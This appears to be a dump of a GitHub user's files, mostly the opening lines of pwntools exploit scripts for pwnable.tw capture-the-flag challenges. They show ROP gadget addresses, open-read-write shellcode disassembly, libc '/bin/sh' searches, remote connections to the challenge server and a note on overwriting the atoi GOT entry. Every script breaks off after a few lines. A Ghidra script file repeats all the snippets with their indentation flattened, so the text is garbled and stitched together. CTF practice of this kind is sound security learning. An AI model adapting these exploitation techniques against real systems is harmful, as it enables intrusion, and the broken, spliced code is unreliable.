Binpang bin2415

## attack_calc.py
from pwn import *
from struct import pack

#/bin/sh/ = 0x6e69622f,0x0068732f

addr1 = 0x8070880 # int 80; ret
addr2 = 0x807cb7f # inc eax; ret
addr3 = 0x80908d0 # mov eax, 7;ret
addr4 = 0x80701aa # pop edx; ret
addr5 = 0x80701d1 # pop ecx; pop ebx; ret

## attack_orw.py
from pwn import *

'''
  e:	b8 05 00 00 00       	mov    $0x5,%eax
  13:	bb 9f a0 04 08   	    mov    addr(shellcode+0x39),%ebx
  18:	b9 9a 02 00 00       	mov    $0x29a,%ecx
  1d:	ba 00 00 00 00       	mov    $0x0,%edx
  22:	cd 80                	int    $0x80
  24:	89 c3                	mov    %eax,%ebx
  27:	b8 03 00 00 00       	mov    $0x3,%eax

## attack_hacknote.py
from pwn import *

#p = process('./hacknote', env={"LD_PRELOAD" : "./libc_32.so.6"})
p = remote('chall.pwnable.tw', 10102)

libc = ELF('./libc_32.so.6')
binsh_addr = 0
for address in libc.search('/bin/sh\x00'):
    print("/bin/sh address is " + str(hex(address)))
    binsh_addr = address

## attack_dubblesort.py
from pwn import *


libc = ELF('./libc.so.6')
binsh_addr = 0
for address in libc.search('/bin/sh\x00'):
    print(address)
    binsh_addr = address
    break

## attack_silver_bullet.py
from pwn import *

silver_bullet = ELF('./silver_bullet')
libc = ELF('./libc_32.so.6')

#p = process('silver_bullet', env={'LD_PRELOAD' : './libc_32.so.6'})

p = remote('chall.pwnable.tw', 10103)
p.recvuntil('Your choice :')
p.sendline('1')

## attack_applestore.py
from pwn import *

'''
control ebp to control the stack, so can modify atoi got

这道题的关键还是通过控制ebp来控制对atoi的got表项进行修改
'''

def addDevice(device_num):
    p.recvuntil('>')

## Dockerfile
FROM ubuntu:18.04

# Install dependencies
RUN apt-get -y update; \
    apt-get install -y --no-install-recommends \
        ca-certificates build-essential \
        autoconf automake cmake dpkg-dev file git make patch \
        libc-dev libc++-dev libgcc-8-dev libstdc++-8-dev python python-dev  \
        dirmngr gnupg2 lbzip2 wget xz-utils libtinfo5;

## ghidraCFG.py
#TODO write a description for this script
#@author Chengbin, MyriaCore
#@category Functions
#@keybinding
#@menupath
#@toolbar


#TODO Add User Code Here
	from pwn import *
	from struct import pack

	#/bin/sh/ = 0x6e69622f,0x0068732f

	addr1 = 0x8070880 # int 80; ret
	addr2 = 0x807cb7f # inc eax; ret
	addr3 = 0x80908d0 # mov eax, 7;ret
	addr4 = 0x80701aa # pop edx; ret
	addr5 = 0x80701d1 # pop ecx; pop ebx; ret
	from pwn import *

	'''
	e: b8 05 00 00 00 mov $0x5,%eax
	13: bb 9f a0 04 08 mov addr(shellcode+0x39),%ebx
	18: b9 9a 02 00 00 mov $0x29a,%ecx
	1d: ba 00 00 00 00 mov $0x0,%edx
	22: cd 80 int $0x80
	24: 89 c3 mov %eax,%ebx
	27: b8 03 00 00 00 mov $0x3,%eax
	from pwn import *

	#p = process('./hacknote', env={"LD_PRELOAD" : "./libc_32.so.6"})
	p = remote('chall.pwnable.tw', 10102)

	libc = ELF('./libc_32.so.6')
	binsh_addr = 0
	for address in libc.search('/bin/sh\x00'):
	print("/bin/sh address is " + str(hex(address)))
	binsh_addr = address
	from pwn import *


	libc = ELF('./libc.so.6')
	binsh_addr = 0
	for address in libc.search('/bin/sh\x00'):
	print(address)
	binsh_addr = address
	break
	from pwn import *

	silver_bullet = ELF('./silver_bullet')
	libc = ELF('./libc_32.so.6')

	#p = process('silver_bullet', env={'LD_PRELOAD' : './libc_32.so.6'})

	p = remote('chall.pwnable.tw', 10103)
	p.recvuntil('Your choice :')
	p.sendline('1')
	from pwn import *

	'''
	control ebp to control the stack, so can modify atoi got

	这道题的关键还是通过控制ebp来控制对atoi的got表项进行修改
	'''

	def addDevice(device_num):
	p.recvuntil('>')
	FROM ubuntu:18.04

	# Install dependencies
	RUN apt-get -y update; \
	apt-get install -y --no-install-recommends \
	ca-certificates build-essential \
	autoconf automake cmake dpkg-dev file git make patch \
	libc-dev libc++-dev libgcc-8-dev libstdc++-8-dev python python-dev \
	dirmngr gnupg2 lbzip2 wget xz-utils libtinfo5;
	#TODO write a description for this script
	#@author Chengbin, MyriaCore
	#@category Functions
	#@keybinding
	#@menupath
	#@toolbar


	#TODO Add User Code Here